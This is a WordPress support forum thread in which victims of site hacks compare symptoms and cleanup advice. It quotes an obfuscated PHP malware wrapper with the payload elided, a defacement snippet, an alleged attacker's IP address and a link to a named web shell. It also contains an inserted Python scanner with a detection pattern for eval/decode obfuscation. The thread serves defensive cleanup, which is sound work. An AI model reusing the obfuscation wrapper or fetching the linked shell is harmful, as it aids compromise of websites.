
Site has been hacked (19 posts)

  1. veejay
    Member
    Posted 2 years ago #

    WordPress.org does not recognize me at all - not my email address, my username, or my password. My host took my site back from theme eleven to default after my site had been completely taken over by a hacker.
    The blog is still there, but I cannot get in as administrator.
    Do I start all over again? If I have to start from scratch, how do I do that? By the way, there are no sites on my FTP either.
    Help, anybody?

  2. Sage Brownell
    Member
    Posted 2 years ago #

  3. scott22
    Member
    Posted 2 years ago #

    I am a website developer and have been hacked by people referring to themselves as linuxploit crew. I ran my site with Sucuri malware scanning software, which is free and told me exactly where to go, and I was able to delete the items. It affected about 100 sites so it took quite long to do this. I thought I was through with this nightmare and now one of my accounts contacted me and said they could not access their account. I went in and removed malware again... it was in the index page and in the footer and index of the theme. I changed the password on FileZilla, my hosting company and my FTP login. I am at a loss and would love any advice! Thank you. All my WordPress sites have the latest versions and all plugins are up to date too. I am only using the most popular plugins as listed by WordPress too. My hosting company is 1and1.com

  4. nettybet
    Member
    Posted 2 years ago #

    I lost twelve sites this week and am devastated. Most current WP and plug-ins, and most popular plug-ins at that. My hosting reseller account is with Lonex. I can't change my passwords fast enough to stay ahead of my hacker "Saad" IP Iraq. I use a 64-bit system and need advice on a malware scanning program.

  5. scott22
    Member
    Posted 2 years ago #

    http://sitecheck.sucuri.net/scanner/ is what I used to scan them and it took me right to the source of the attack. Let me know what it says and I will try to help you.

  6. workingit
    Member
    Posted 2 years ago #

    ditto - I'm in the same boat

    that is "WordPress.org does not recognize me at all - not my email address, my username, or my password. My host took my site back from theme eleven to default after my site had been completely taken over by a hacker.
    The blog is still there, but I cannot get in as administrator."

    I ran through this site as suggested above;
    http://sitecheck.sucuri.net/scanner/

    and no malware or blacklist but rec that I upgrade my wordpress

    I got into my FTP using my web host and am now downloading my site to a folder on my desktop.

    When that is done, what should I do?

  7. scott22
    Member
    Posted 2 years ago #

    Not an expert. If you don't have a backup of your site, your server can sometimes send you a copy of the site if done quickly after your site is hacked. You can log in to your FTP and load the backup copy of the site and this should allow you to restore the site to before it was hacked. After you load the site, run that scan and see if the malware was in your site before it went down. Good luck!

  8. lorrequer
    Member
    Posted 2 years ago #

    Alas I have to join the ranks of having been hacked this morning. So frustrating. I ran the sitecheck scan and I got back this message:
    Web site defaced.
    Details: http://sucuri.net/malware/entry/MW:DEFACED:01
    <p align="center"><b><font color="red" face="Tahoma">HaCkEd BY Mr.m0r0 MoRoCcAn HaCkEr</font>
    <font color=green>Mr.m0r0 WaS HeRe </h2></font>
    and Malaware detected at http://www.404testpage4525d2fdc

    I presume there is nothing I can do about this. My hosting server wants to take it all down and I can restore from backups.

  9. scott22
    Member
    Posted 2 years ago #

    You could go into your FTP, find that file and look for malware. When you find that file, highlight it, hold down and look for view/edit. My hacks were usually at the bottom of the page; it looked totally different from the other code. I erased it and then saved. If you have multiple sites, scan the other sites too. Good luck.

  10. olavxxx
    Member
    Posted 2 years ago #

    Try to google your plugins. TimThumb for one has maaany security flaws..

  11. mannyreyes
    Member
    Posted 2 years ago #

    I also created a thread about being hacked and got ignored. Yes, it is true and it is out there. I have a hosting account and so far 4 of my domains have been hacked. I changed passwords, SQL passwords, email passwords, blocked IP addresses, etc. and they still get in.

    My first site was hacked directly to the root, implanting a mijn some ign bank link phishing site. My other sites have been through tinymce; they inject a security.html file.

    My hosting people keep suspending my accounts and it is getting annoying, and since they don't know, they keep telling me I need to be sure I have the latest updates, which I do.

  12. nettybet
    Member
    Posted 2 years ago #

    @Scott, What do you know about a software named "SpyShelter" if anything?

  13. scott22
    Member
    Posted 2 years ago #

    Found out a lot today about the flaws in my WordPress themes and the root of my hack. They enter my server through the timthumb image resizing tool on a lot of WordPress themes. I bought a lot of themes from ThemeForest and many of my sites had this in the themes. I am attaching an article that might help people with this issue. My server helped me find the access point for the hackers. After they had access they spread malware to my 110 sites (NIGHTMARE is close to being over) http://www.woothemes.com/2011/08/timthumb-security-flaw-patch/
    This article came from a theme seller so you know many people around the country are experiencing the same thing. And this is what the malware in my site looked like:

    eval(gzuncompress(base64_decode('...'))); ?>

    I hope this helps!
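
A defender-side sweep for the eval/decode wrapper quoted in the post above, as an added example that is not part of the original thread. The function names, the decoder list and the sample theme directory are assumptions made for illustration; the "tail" flag reflects the earlier remark that the injected code usually sat at the bottom of the file.

```python
import os
import re
import tempfile

# eval( followed by one or more nested decode/decompress calls, as in the post.
DECODERS = rb"(?:base64_decode|gzuncompress|gzinflate|gzdecode|str_rot13)"
PATTERN = re.compile(rb"\beval\s*\(\s*(?:" + DECODERS + rb"\s*\(\s*)+", re.IGNORECASE)
PHP_EXT = (".php", ".phtml", ".inc")


def scan_bytes(data):
    """Return (line_number, in_last_tenth_of_file) for each wrapper found."""
    hits = []
    for m in PATTERN.finditer(data):
        line = data.count(b"\n", 0, m.start()) + 1
        hits.append((line, m.start() >= len(data) * 0.9))
    return hits


def scan_tree(root):
    """Walk root and return {relative_path: hits} for PHP files that match."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(PHP_EXT):
                continue
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                hits = scan_bytes(fh.read())
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings


def demo():
    """Scan a constructed theme folder: one clean file, one with an appended stub."""
    clean = b"<?php\nget_header();\n?>\n<div>content</div>\n" * 20
    injected = clean + b"<?php eval(gzuncompress(base64_decode('PLACEHOLDER'))); ?>\n"
    with tempfile.TemporaryDirectory() as root:
        theme = os.path.join(root, "wp-content", "themes", "example")
        os.makedirs(theme)
        for name, body in (("index.php", clean), ("footer.php", injected)):
            with open(os.path.join(theme, name), "wb") as fh:
                fh.write(body)
        return scan_tree(root)


if __name__ == "__main__":
    for path, hits in demo().items():
        print(path, hits)
```

Run `scan_tree()` against a downloaded copy of the site rather than the live server. A hit marks a file to review by hand or replace from a known-good copy, and a clean result does not rule out other obfuscation styles.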

  14. nettybet
    Member
    Posted 2 years ago #

    Wow! Thank you so much Scott. My themes are all from Theme Forest and I went to the link but am not sure how to fix. I have Dynamix and Awake. Can you help? I want to replace these files before new sites get hacked. =)

  15. scott22
    Member
    Posted 2 years ago #

    I use Awake and Dynamix on several sites. How do you want me to contact you? I could friend you on Facebook? How many sites do you have? I think I can help you.

  16. mannyreyes
    Member
    Posted 2 years ago #

    I have also been working with my hosting people and they did some research. Two of my sites have been hacked and had a file deposited under the tinymce folder. Sadly I deleted the folder and the WYSIWYG didn't work well, so I uploaded a fresh copy of the folder, but it seems that tinymce has a vulnerability as well. Read this: http://seclists.org/fulldisclosure/2011/Nov/427?utm_source=twitterfeed&utm_medium=twitter

  17. Sven D.
    Member
    Posted 2 years ago #

    @ nettybet

    If the hacker at your site always has IPs from Iraq, then it might be an idea to block that country in the htaccess file. You can then drop the htaccess file in the root folder (blocking your whole site for visitors from Iraq) or just put the htaccess file in the admin folder to prevent access to that folder for Iraq IPs.

  18. nettybet
    Member
    Posted 2 years ago #

    @ Sven D.
    Thank you! Their IP information is Win7
    1366x768 Iraq Flag Irbil,
    Arbil,
    Iraq Evdo-subscribers-erbil (109.127.86.97)

    @ Scott
    I will send you a private message with contact info. However, did you know there is a TimThumb plug-in to test vulnerability? A friend I forwarded your info to sent me this link: http://wordpress.org/extend/plugins/timthumb-vulnerability-scanner/
    Curious what everyone thinks of this plug-in?

  19. essaum
    Member
    Posted 1 year ago #

    I had a similar experience, and I found the kit used by the hacker. It was uploaded via a vbulletin script security hole or (calender.php , faq.php , search.php).
    This is the shell used in the hacking: http://bit.ly/VOYDiI
    Its name is: (S a u d i S h 3 l l v1.0)
    You should scan your server for this evil shell, and also scan all the accounts for a file (usually called script.php) that is planted in many accounts on your server, and delete them all.
    If you don't find the shell, the hacker will be able to use it any time he wants.

Topic Closed

This topic has been closed to new replies.
